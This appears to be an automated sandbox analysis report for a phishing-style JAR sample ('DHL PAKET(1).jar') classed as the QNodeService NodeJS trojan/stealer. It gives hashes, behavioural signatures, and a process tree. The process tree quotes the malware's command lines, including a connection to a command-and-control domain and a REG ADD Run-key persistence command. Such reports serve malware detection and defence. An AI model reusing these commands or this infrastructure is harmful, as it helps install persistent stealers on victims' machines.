Analysis
-
max time kernel
60s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-11-2020 20:18
Static task
static1
Behavioral task
behavioral1
Sample
DHL PAKET(1).jar
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
DHL PAKET(1).jar
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
DHL PAKET(1).jar
-
Size
78KB
-
MD5
58f7e6ce14c9de20d69d827cb46a01c3
-
SHA1
5add0ecce78774811645614bb66272a274013727
-
SHA256
6d7391f3b72f90dc29c7ec23669cfd7d446bca076785a54dc62ffefb5afe9177
-
SHA512
c8ba502abf70b324a2ecc5f9cbf92c28c71bcbc796e8d635d9a4671d11ef8630a53a745854c74308f9c4592af70b72a0e3575d928051a0d61c03a55277f3ddb1
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2188 node.exe 3928 node.exe 1792 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6dd0b67-fbd5-4a37-8aae-5fc267672069 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab9a-163.dat js behavioral2/files/0x000100000001ab9a-167.dat js behavioral2/files/0x000100000001ab9a-171.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 wtfismyip.com 29 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2188 node.exe 2188 node.exe 2188 node.exe 2188 node.exe 3928 node.exe 3928 node.exe 3928 node.exe 3928 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe 1792 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2484 wrote to memory of 2764 2484 java.exe 76 PID 2484 wrote to memory of 2764 2484 java.exe 76 PID 2764 wrote to memory of 2188 2764 javaw.exe 80 PID 2764 wrote to memory of 2188 2764 javaw.exe 80 PID 2188 wrote to memory of 3928 2188 node.exe 82 PID 2188 wrote to memory of 3928 2188 node.exe 82 PID 3928 wrote to memory of 1792 3928 node.exe 83 PID 3928 wrote to memory of 1792 3928 node.exe 83 PID 1792 wrote to memory of 188 1792 node.exe 85 PID 1792 wrote to memory of 188 1792 node.exe 85 PID 188 wrote to memory of 3700 188 cmd.exe 86 PID 188 wrote to memory of 3700 188 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL PAKET(1).jar"1⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\d7fc52d4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain spaco110cddfdf.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_QLUTMU\boot.js --hub-domain spaco110cddfdf.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_QLUTMU\boot.js --hub-domain spaco110cddfdf.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e6dd0b67-fbd5-4a37-8aae-5fc267672069" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e6dd0b67-fbd5-4a37-8aae-5fc267672069" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3700
-
-
-
-
-
-